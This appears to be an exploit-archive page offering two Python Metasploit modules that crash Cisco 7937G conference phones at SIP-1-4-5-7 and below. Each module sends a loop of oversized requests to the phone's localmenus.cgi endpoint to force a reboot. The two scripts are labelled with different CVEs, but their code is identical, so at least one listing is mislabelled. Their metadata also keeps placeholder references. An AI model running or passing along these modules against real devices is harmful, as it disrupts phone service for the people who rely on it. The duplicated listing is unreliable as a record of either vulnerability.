Cisco 7937G Denial Of Service

Two denial of service exploits for Cisco 7937G versions SIP-1-4-5-7 and below.


MD5 | 5534c1f0e1f875aee45b3734baba6fdb

CVE-2020-16138.py:

# Exploit Title: Cisco 7937G DoS 2 MSF Module
# Date: 2020-08-10
# Exploit Author: Cody Martin
# Vendor Homepage: https://cisco.com
# Version: <=SIP-1-4-5-7
# Tested On: SIP-1-4-5-5, SIP-1-4-5-7
# CVE: CVE-2020-16138

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

# standard modules
import logging

# extra modules
dependencies_missing = False
try:
import requests
except ImportError:
dependencies_missing = True

from metasploit import module


metadata = {
'name': 'Cisco 7937G Denial-of-Service Reboot Attack',
'description': '''
DoS reset attack
''',
'authors': [
'Cody Martin'
],
'date': '2020-06-02',
'license': 'GPL_LICENSE',
'references': [
{'type': 'url', 'ref': '<url>'},
{'type': 'cve', 'ref': '2020-#'},
{'type': 'edb', 'ref': '#'}
],
'type': 'dos',
'options': {
'rhost': {'type': 'address', 'description': 'Target address', 'required': True, 'default': 'None'}
}
}


def run(args):
module.LogHandler.setup(msg_prefix='{} - '.format(args['rhost']))
if dependencies_missing:
logging.error('Module dependency (requests) is missing, cannot continue')
return

# Exploit
url = "http://{}/localmenus.cgi".format(args['rhost'])
data = "A"*46
payload = {"func": "609", "data": data, "rphl": "1"}
logging.info("FIRING ZE MIZZLES!")
for i in range(1000):
try:
r = requests.post(url=url, params=payload, timeout=5)
if r.status_code != 200:
logging.error("Device doesn't appear to be functioning or web access is not enabled.")
return
except requests.exceptions.RequestException:
logging.info('DoS reset attack completed!')
return


if __name__ == '__main__':
module.run(metadata, run)

--------------------
CVE-2020-16139.py:

# Exploit Title: Cisco 7937G DoS 1 MSF Module
# Date: 2020-08-10
# Exploit Author: Cody Martin
# Vendor Homepage: https://cisco.com
# Version: <=SIP-1-4-5-7
# Tested On: SIP-1-4-5-5, SIP-1-4-5-7
# CVE: CVE-2020-16139

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

# standard modules
import logging

# extra modules
dependencies_missing = False
try:
import requests
except ImportError:
dependencies_missing = True

from metasploit import module


metadata = {
'name': 'Cisco 7937G Denial-of-Service Reboot Attack',
'description': '''
DoS reset attack
''',
'authors': [
'Cody Martin'
],
'date': '2020-06-02',
'license': 'GPL_LICENSE',
'references': [
{'type': 'url', 'ref': '<url>'},
{'type': 'cve', 'ref': '2020-#'},
{'type': 'edb', 'ref': '#'}
],
'type': 'dos',
'options': {
'rhost': {'type': 'address', 'description': 'Target address', 'required': True, 'default': 'None'}
}
}


def run(args):
module.LogHandler.setup(msg_prefix='{} - '.format(args['rhost']))
if dependencies_missing:
logging.error('Module dependency (requests) is missing, cannot continue')
return

# Exploit
url = "http://{}/localmenus.cgi".format(args['rhost'])
data = "A"*46
payload = {"func": "609", "data": data, "rphl": "1"}
logging.info("FIRING ZE MIZZLES!")
for i in range(1000):
try:
r = requests.post(url=url, params=payload, timeout=5)
if r.status_code != 200:
logging.error("Device doesn't appear to be functioning or web access is not enabled.")
return
except requests.exceptions.RequestException:
logging.info('DoS reset attack completed!')
return


if __name__ == '__main__':
module.run(metadata, run)

Related Posts